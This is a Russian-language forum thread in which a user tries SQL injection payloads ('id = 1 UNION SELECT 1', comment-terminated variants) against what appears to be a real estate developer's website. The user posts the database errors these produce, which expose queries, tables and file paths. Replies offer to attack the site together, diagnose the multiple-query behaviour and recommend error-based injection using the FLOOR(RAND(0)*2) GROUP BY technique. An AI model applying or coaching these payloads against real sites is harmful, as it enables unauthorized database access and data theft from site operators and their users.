id = 1 На выводе пустая страница id = 1 UNION SELECT 1 Выдает: Code: Ошибка базы данных. Error Number: 1054 Unknown column 'verdict' in 'field list' SELECT COUNT(rating) AS count FROM complex_reviews WHERE complex_id=1 UNION SELECT 1 AND verdict = 1 Filename: /modules/developers/models/reviews.php Line Number: 242 id = 1 UNION SELECT 1-- Выдает: Code: Ошибка базы данных. Error Number: 1222 The used SELECT statements have a different number of columns SELECT `complex`.*, `developers`.`developer_title`, `developers`.`developer_id`, `developers`.`developer_city`, `developers`.`developer_logo` FROM (`complex`) JOIN `developers` ON `complex`.`developer_id` = `developers`.`developer_id` WHERE complex_id = 1 UNION SELECT 1-- ORDER BY `developers`.`developer_id` desc LIMIT 1 Filename: /modules/developers/models/model_developers.php Line Number: 35 Помогите разобраться, хавидж раскрутил, так что мне вдвойне обидно (
Дык Вы бы адресок дали, а то как-то не очень в теории раскручивать)) Авось, всем колхозом раздолбаем))
Долбать не надо, тем более всем колхозом) Считайте, что это задача из учебника: добавляем 2 минуса и получаем совершенно другой запрос - в школе мы такого не проходили
у вас два разных запроса. сначала не работает 1 из-за того, что нет колонки verdict, во второй раз ошибка в другом запросе, т. к. в первом все равно, а во втором не хватает колонок. возможно, что пройдет и union-based, но error-based должен сработать точно
А понял, значение параметра id поочередно передается в несколько запросов, так? Но как выводить поля в случае error-based?
Да знаю, я. Некто Квазар решил что sELECT COUNT(*),FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.TABLES GROUP BY x выдает ошибку, но не удосужился объяснить, почему, вот и спрашиваю а попробуйте вместо двойки написать 1000. То же? А попробуйте теперь 46436794876